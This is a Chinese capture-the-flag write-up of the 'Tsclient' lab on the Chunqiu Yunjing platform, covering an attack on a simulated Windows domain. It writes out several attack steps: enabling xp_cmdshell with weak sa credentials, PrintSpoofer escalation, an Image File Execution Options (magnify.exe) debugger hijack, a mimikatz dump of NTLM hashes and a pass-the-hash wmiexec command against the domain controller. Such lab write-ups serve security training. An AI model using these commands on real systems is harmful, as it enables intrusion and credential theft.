春秋云镜Tsclient WP

春秋云镜Tsclient WP

Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。

flag01

首先拿到站点,是一个IIS首页,没什么东西,开始信息收集。

image-20231203143415212

fscan一把梭,拿到mssql的账户名和密码,sa 1qaz!QAZ

因为目标靶机开启了3389端口(fscan没扫出来,nmap扫出来的,忘截图了),navicat连接上数据库,刚开始的思路是新建一个用户然后加到管理员组,然后直接连接。

参考如下:SQL Server 数据库提权的几种方法——提权教程_sql提权_W小哥1的博客-CSDN博客

首先尝试xp_cmdshell:

EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

然后执行命令查看whoami:

image-20231203143959688

新建用户:

image-20231203144104237

错误,应该是权限不对,看看sp_oacreate提权:

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   

image-20231203144139054

这里也不报错,但是登陆的话账户密码还是不对。

于是乎,想起来了MDUT,进行连接。

image-20231203150724884

上传cs木马,执行。(这里因为我在navicat的操作打开了xp_cmd,否则的话在工具中要先激活组件)

image-20231203151343773

image-20231203151351614

上线,但是这里的权限还是很低的。接下来我们开始提权

提权

windows系统,直接试试烂土豆提权,我这里的脚本是https://github.com/itm4n/PrintSpoofer,上传,然后上传一个nc,直接反弹shell到我们服务器。

image-20231204154724228

image-20231203155118957

执行我们的木马,拿到系统权限。

image-20231203155254524

image-20231203155234093

拿到flag01

image-20231203155842354

flag{cbc74259-f378-4ada-a98c-c11f324a6dd1}

flag02

接下来我们上传fscan进行内网扫描(结合后面的过程,其实有一台172.22.8.46,但是我这里没扫出来)

[*] LiveTop 172.22.0.0/16    娈靛瓨娲绘暟閲忎负: 4
[*] LiveTop 172.22.8.0/24    娈靛瓨娲绘暟閲忎负: 3
[*] LiveTop 172.22.255.0/24  娈靛瓨娲绘暟閲忎负: 1
172.22.8.15:445 open
172.22.8.18:1433 open
172.22.8.31:445 open
172.22.8.18:445 open
172.22.8.15:139 open
172.22.8.31:139 open
172.22.8.18:139 open
172.22.8.15:135 open
172.22.8.31:135 open
172.22.8.18:135 open
172.22.8.18:80 open
172.22.8.15:88 open
[*] NetInfo 
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] NetInfo 
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01           
[*] NetInfo 
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT         
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ

发现网络共享

查看网络连接状态,发现有其他用户使用rdp连接了这台主机,使用quser,查看到John通过rdp登录。

image-20231203161718469

我们注入John进程

image-20231203161937743

net use查看网络共享,然后dir,发现一个txt文件,记录着一个用户的域用户的账户密码,并且里面还有提示,镜像劫持。

image-20231203162335688

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

密码喷洒

设置好代理之后,我们尝试密码喷洒,看看哪些主机可以登录。

image-20231203170530394

密码过期需要进行修改

看到STATUS_LPGON_FAILURE,意思是密码已经过期,需要修改,接下来利用impacker中的smbpasswd.py进行修改密码

image-20231203171148345

修改的密码如下

Aldrich@xiaorang.lab
Whoami@666

直接登录46主机。

image-20231203171746706

不出网,我们使用cs的转发上线

image-20231203174012135

提权

然后我们尝试放大镜提权

Get-ACL -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl

发现NT AUTHORITY\Authenticated Users可以修改注册表
即所有账号密码登录的用户都可以修改注册表,利用这个性质,修改注册表,使用放大镜进行提权

img

执行下面的语句,修改注册表。

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

image-20231203181506709

锁定用户之后,点击右下角,然后找放大镜,最后成功弹出cmd,然后我们利用改cmd执行木马,上线cs。

image-20231203181451489

拿到flag02flag{311e4ad2-bab3-4608-b4b1-839c418c90c9}

image-20231203181607901

flag03

我们这里抓取hash

Authentication Id : 0 ; 3670633 (00000000:00380269)
Session           : RemoteInteractive from 2
User Name         : Aldrich
Domain            : XIAORANG
Logon Server      : DC01
Logon Time        : 2023/12/3 20:16:50
SID               : S-1-5-21-3289074908-3315245560-3429321632-1105
	msv :	
	 [00000003] Primary
	 * Username : Aldrich
	 * Domain   : XIAORANG
	 * NTLM     : 3c42fe16daa873e60c5e9d0f966369e4
	 * SHA1     : 6e8d5826a1024aeec1593471f4b2bd90487d677f
	 * DPAPI    : 7acb09c872ec5ed2315f33d1d1c837be
	tspkg :	
	wdigest :	
	 * Username : Aldrich
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : Aldrich
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 56533 (00000000:0000dcd5)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/3 20:03:28
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : e212b78fc35c036877d53814c96d3d71
	 * SHA1     : cf8ac1a12f37971b6e2e0bc887f4343c3d72bcf0
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 31 b5 ef 40 96 5c 69 66 7a 2a ba e8 4c 36 b2 ad c2 be ef 8c 64 86 d9 a9 1c 6d c9 48 09 4c 4e 0a ae 99 25 35 1a d1 e2 a5 7d 3e 16 bf 95 72 b3 f7 9d 2a b0 e6 c8 87 a3 f0 54 00 71 c8 1e ff 04 db 1a e1 b2 8e 51 b3 68 8a ba 79 e3 a0 0c cd 73 e1 4e 58 7c 0d 5a 76 08 7e 38 87 63 dc 6c c7 42 a0 ee f8 8b f0 a3 9c 44 58 76 34 9e 4c 68 12 ee af 9b 6c f4 50 45 ea 1c 73 dc fe b0 09 d1 e8 5e cf a9 08 7e 12 e2 1a 74 07 62 de c4 e1 41 67 39 86 99 17 0a ae d9 66 a6 11 66 30 ef b1 36 08 55 0a 66 6c 58 d2 e3 0c bf c9 84 3c be b2 40 2e 1b 2f f3 44 52 63 38 17 6f 75 42 30 9c a8 60 89 0f 16 62 21 94 20 ce ba 71 41 99 ce dd 26 cb 2a 88 04 6d ef 6e 73 26 c4 09 6e e3 c9 f8 86 b5 74 20 4b c8 3d da 81 ef 80 a0 8f 5a 7d 42 2c 96 c8 db ec 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN2016$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/12/3 20:03:28
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : e212b78fc35c036877d53814c96d3d71
	 * SHA1     : cf8ac1a12f37971b6e2e0bc887f4343c3d72bcf0
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : win2016$
	 * Domain   : XIAORANG.LAB
	 * Password : 31 b5 ef 40 96 5c 69 66 7a 2a ba e8 4c 36 b2 ad c2 be ef 8c 64 86 d9 a9 1c 6d c9 48 09 4c 4e 0a ae 99 25 35 1a d1 e2 a5 7d 3e 16 bf 95 72 b3 f7 9d 2a b0 e6 c8 87 a3 f0 54 00 71 c8 1e ff 04 db 1a e1 b2 8e 51 b3 68 8a ba 79 e3 a0 0c cd 73 e1 4e 58 7c 0d 5a 76 08 7e 38 87 63 dc 6c c7 42 a0 ee f8 8b f0 a3 9c 44 58 76 34 9e 4c 68 12 ee af 9b 6c f4 50 45 ea 1c 73 dc fe b0 09 d1 e8 5e cf a9 08 7e 12 e2 1a 74 07 62 de c4 e1 41 67 39 86 99 17 0a ae d9 66 a6 11 66 30 ef b1 36 08 55 0a 66 6c 58 d2 e3 0c bf c9 84 3c be b2 40 2e 1b 2f f3 44 52 63 38 17 6f 75 42 30 9c a8 60 89 0f 16 62 21 94 20 ce ba 71 41 99 ce dd 26 cb 2a 88 04 6d ef 6e 73 26 c4 09 6e e3 c9 f8 86 b5 74 20 4b c8 3d da 81 ef 80 a0 8f 5a 7d 42 2c 96 c8 db ec 
	ssp :	
	credman :	

Authentication Id : 0 ; 3643599 (00000000:003798cf)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/3 20:16:50
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 4ba974f170ab0fe1a8a1eb0ed8f6fe1a
	 * SHA1     : e06238ecefc14d675f762b08a456770dc000f763
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 9e ae c4 7a ed ee 91 74 a5 59 61 a5 00 2c c5 00 60 3b 87 48 d0 17 48 cf df 7b 14 af 9a 99 22 b5 94 ba 0a 1e f0 6e f0 25 b1 e2 a2 62 fb b8 68 93 42 64 08 b7 f6 2e f7 cf ae a3 7a 94 9d 32 24 1a b1 6b 87 6c 5e f1 d3 89 c6 c4 8b d3 bd 05 9c b0 e1 85 d4 2c 03 56 5f af 09 15 12 10 df 74 e7 4c d3 65 55 d8 ab bd b4 71 5c 8c a7 bd 14 60 8b 44 b5 d8 d8 61 23 f1 4f 4d 8e a0 dc ac 8a 60 15 0d f7 9f a1 85 98 c4 cf 34 ec ee ea c5 b9 5b 42 8b 97 cc 4d ed 1f db 8c b4 45 06 ce 40 fc 81 96 ac c3 61 e5 e9 42 90 69 f3 b2 85 fa 80 59 e2 8b a5 f6 70 5d 1a bd 5f b1 85 6b ae b0 16 42 29 2c 99 57 fb 49 ea e3 29 49 56 55 6c 9a 2b ee 13 77 fe d7 a3 51 b8 01 ec bb 60 22 b8 7c 2f f5 6b 0f 6b 87 36 76 45 81 7e e3 71 0a a8 ca 2a a3 a6 05 64 
	ssp :	
	credman :	

Authentication Id : 0 ; 3642706 (00000000:00379552)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/3 20:16:50
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : e212b78fc35c036877d53814c96d3d71
	 * SHA1     : cf8ac1a12f37971b6e2e0bc887f4343c3d72bcf0
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 31 b5 ef 40 96 5c 69 66 7a 2a ba e8 4c 36 b2 ad c2 be ef 8c 64 86 d9 a9 1c 6d c9 48 09 4c 4e 0a ae 99 25 35 1a d1 e2 a5 7d 3e 16 bf 95 72 b3 f7 9d 2a b0 e6 c8 87 a3 f0 54 00 71 c8 1e ff 04 db 1a e1 b2 8e 51 b3 68 8a ba 79 e3 a0 0c cd 73 e1 4e 58 7c 0d 5a 76 08 7e 38 87 63 dc 6c c7 42 a0 ee f8 8b f0 a3 9c 44 58 76 34 9e 4c 68 12 ee af 9b 6c f4 50 45 ea 1c 73 dc fe b0 09 d1 e8 5e cf a9 08 7e 12 e2 1a 74 07 62 de c4 e1 41 67 39 86 99 17 0a ae d9 66 a6 11 66 30 ef b1 36 08 55 0a 66 6c 58 d2 e3 0c bf c9 84 3c be b2 40 2e 1b 2f f3 44 52 63 38 17 6f 75 42 30 9c a8 60 89 0f 16 62 21 94 20 ce ba 71 41 99 ce dd 26 cb 2a 88 04 6d ef 6e 73 26 c4 09 6e e3 c9 f8 86 b5 74 20 4b c8 3d da 81 ef 80 a0 8f 5a 7d 42 2c 96 c8 db ec 
	ssp :	
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/12/3 20:03:31
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 56562 (00000000:0000dcf2)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/3 20:03:28
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 4ba974f170ab0fe1a8a1eb0ed8f6fe1a
	 * SHA1     : e06238ecefc14d675f762b08a456770dc000f763
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 9e ae c4 7a ed ee 91 74 a5 59 61 a5 00 2c c5 00 60 3b 87 48 d0 17 48 cf df 7b 14 af 9a 99 22 b5 94 ba 0a 1e f0 6e f0 25 b1 e2 a2 62 fb b8 68 93 42 64 08 b7 f6 2e f7 cf ae a3 7a 94 9d 32 24 1a b1 6b 87 6c 5e f1 d3 89 c6 c4 8b d3 bd 05 9c b0 e1 85 d4 2c 03 56 5f af 09 15 12 10 df 74 e7 4c d3 65 55 d8 ab bd b4 71 5c 8c a7 bd 14 60 8b 44 b5 d8 d8 61 23 f1 4f 4d 8e a0 dc ac 8a 60 15 0d f7 9f a1 85 98 c4 cf 34 ec ee ea c5 b9 5b 42 8b 97 cc 4d ed 1f db 8c b4 45 06 ce 40 fc 81 96 ac c3 61 e5 e9 42 90 69 f3 b2 85 fa 80 59 e2 8b a5 f6 70 5d 1a bd 5f b1 85 6b ae b0 16 42 29 2c 99 57 fb 49 ea e3 29 49 56 55 6c 9a 2b ee 13 77 fe d7 a3 51 b8 01 ec bb 60 22 b8 7c 2f f5 6b 0f 6b 87 36 76 45 81 7e e3 71 0a a8 ca 2a a3 a6 05 64 
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/12/3 20:03:28
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 23871 (00000000:00005d3f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/12/3 20:03:27
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : e212b78fc35c036877d53814c96d3d71
	 * SHA1     : cf8ac1a12f37971b6e2e0bc887f4343c3d72bcf0
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN2016$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/12/3 20:03:27
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : win2016$
	 * Domain   : XIAORANG.LAB
	 * Password : 31 b5 ef 40 96 5c 69 66 7a 2a ba e8 4c 36 b2 ad c2 be ef 8c 64 86 d9 a9 1c 6d c9 48 09 4c 4e 0a ae 99 25 35 1a d1 e2 a5 7d 3e 16 bf 95 72 b3 f7 9d 2a b0 e6 c8 87 a3 f0 54 00 71 c8 1e ff 04 db 1a e1 b2 8e 51 b3 68 8a ba 79 e3 a0 0c cd 73 e1 4e 58 7c 0d 5a 76 08 7e 38 87 63 dc 6c c7 42 a0 ee f8 8b f0 a3 9c 44 58 76 34 9e 4c 68 12 ee af 9b 6c f4 50 45 ea 1c 73 dc fe b0 09 d1 e8 5e cf a9 08 7e 12 e2 1a 74 07 62 de c4 e1 41 67 39 86 99 17 0a ae d9 66 a6 11 66 30 ef b1 36 08 55 0a 66 6c 58 d2 e3 0c bf c9 84 3c be b2 40 2e 1b 2f f3 44 52 63 38 17 6f 75 42 30 9c a8 60 89 0f 16 62 21 94 20 ce ba 71 41 99 ce dd 26 cb 2a 88 04 6d ef 6e 73 26 c4 09 6e e3 c9 f8 86 b5 74 20 4b c8 3d da 81 ef 80 a0 8f 5a 7d 42 2c 96 c8 db ec 
	ssp :	
	credman :	

shell net group "domain admins" /domain发现管理员组有两个账户

image-20231204162411204

而我们上面也抓到了WIN2016$的hash,直接hash传递,利用wmiexec.py

proxychains python3 wmiexec.py -hashes :e212b78fc35c036877d53814c96d3d71 xiaorang.lab/WIN2016\$@172.22.8.15

image-20231203204840943

成功获得shell,拿到flag03flag{294ce447-c166-4573-8596-0238bba3607d}

总结:

1.看其他师傅wp可以直接用krbrelayup提权

2.可以用bloodhound来进行域内环境分析

posted @ 2023-12-04 16:40  fdx_xdf  阅读(289)  评论(0编辑  收藏  举报